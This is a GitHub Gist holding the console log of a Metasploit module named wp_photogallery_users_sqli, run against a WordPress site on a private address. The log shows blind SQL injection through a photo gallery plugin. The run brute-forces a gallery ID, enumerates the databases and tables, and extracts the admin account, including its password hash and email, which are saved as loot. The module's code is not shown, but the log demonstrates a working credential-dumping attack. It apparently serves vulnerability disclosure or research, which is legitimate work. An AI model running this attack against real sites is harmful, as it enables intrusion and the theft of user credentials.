Created
January 12, 2015 17:44
-
-
Save brandonprry/939bb8e969a57301ffc3 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Module options (auxiliary/gather/wp_photogallery_users_sqli): | |
Name Current Setting Required Description | |
---- --------------- -------- ----------- | |
GALLERYID no Gallery ID to use. If not provided, the module will attempt to bruteforce one. | |
Proxies no Use a proxy chain | |
RHOST 172.31.16.30 yes The target address | |
RPORT 80 yes The target port | |
TARGETURI /wordpress yes Relative URI of Wordpress installation | |
VHOST no HTTP server virtual host | |
msf auxiliary(wp_photogallery_users_sqli) > run | |
[*] No GALLERYID supplied, attempting bruteforce. | |
[*] Found a gallery with an ID of 1 | |
[*] Looks like there are 4 databases. | |
[*] Schema 0's name has a length of 18. Getting name. | |
[*] Found database information_schema | |
[*] Schema 1's name has a length of 5. Getting name. | |
[*] Found database mysql | |
[*] Schema 2's name has a length of 18. Getting name. | |
[*] Found database performance_schema | |
[*] Schema 3's name has a length of 9. Getting name. | |
[*] Found database wordpress | |
[*] Schema wordpress has 21 tables. Enumerating. | |
[*] Table 0's name has a length of 12 | |
[*] Found table wp_bwg_album | |
[*] Table 1's name has a length of 20 | |
[*] Found table wp_bwg_album_gallery | |
[*] Table 2's name has a length of 14 | |
[*] Found table wp_bwg_gallery | |
[*] Table 3's name has a length of 12 | |
[*] Found table wp_bwg_image | |
[*] Table 4's name has a length of 20 | |
[*] Found table wp_bwg_image_comment | |
[*] Table 5's name has a length of 17 | |
[*] Found table wp_bwg_image_rate | |
[*] Table 6's name has a length of 16 | |
[*] Found table wp_bwg_image_tag | |
[*] Table 7's name has a length of 13 | |
[*] Found table wp_bwg_option | |
[*] Table 8's name has a length of 16 | |
[*] Found table wp_bwg_shortcode | |
[*] Table 9's name has a length of 12 | |
[*] Found table wp_bwg_theme | |
[*] Table 10's name has a length of 14 | |
[*] Found table wp_commentmeta | |
[*] Table 11's name has a length of 11 | |
[*] Found table wp_comments | |
[*] Table 12's name has a length of 8 | |
[*] Found table wp_links | |
[*] Table 13's name has a length of 10 | |
[*] Found table wp_options | |
[*] Table 14's name has a length of 11 | |
[*] Found table wp_postmeta | |
[*] Table 15's name has a length of 8 | |
[*] Found table wp_posts | |
[*] Table 16's name has a length of 21 | |
[*] Found table wp_term_relationships | |
[*] Table 17's name has a length of 16 | |
[*] Found table wp_term_taxonomy | |
[*] Table 18's name has a length of 8 | |
[*] Found table wp_terms | |
[*] Table 19's name has a length of 11 | |
[*] Found table wp_usermeta | |
[*] Table 20's name has a length of 8 | |
[*] Found table wp_users | |
[*] Found 1 possible user tables. Enumerating users. | |
[*] Table wp_users has 1 rows. | |
[*] Column ID of row 0 has a length of 1 | |
[*] Found value 1 for column ID, row 0 | |
[*] Column user_url of row 0 has a length of 0 | |
[*] Found value for column user_url, row 0 | |
[*] Column user_pass of row 0 has a length of 34 | |
[*] Found value $P$BESKOZoFLfOMuIigKqrfHmw44A4zz5. for column user_pass, row 0 | |
[*] Column user_login of row 0 has a length of 5 | |
[*] Found value admin for column user_login, row 0 | |
[*] Column user_email of row 0 has a length of 23 | |
[*] Found value hfjdsajk@fdhjksfdsa.com for column user_email, row 0 | |
[*] Column user_status of row 0 has a length of 1 | |
[*] Found value 0 for column user_status, row 0 | |
[*] Column display_name of row 0 has a length of 5 | |
[*] Found value admin for column display_name, row 0 | |
[*] Column user_nicename of row 0 has a length of 5 | |
[*] Found value admin for column user_nicename, row 0 | |
[*] Column user_registered of row 0 has a length of 19 | |
[*] Found value 2015-01-1214:44:12 for column user_registered, row 0 | |
[*] Column user_activation_key of row 0 has a length of 0 | |
[*] Found value for column user_activation_key, row 0 | |
[+] Users stored in JSON file /home/bperry/.msf4/loot/20150112094250_default_172.31.16.30_wordpress.file_147953.bin | |
[*] Auxiliary module execution completed | |
msf auxiliary(wp_photogallery_users_sqli) > |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment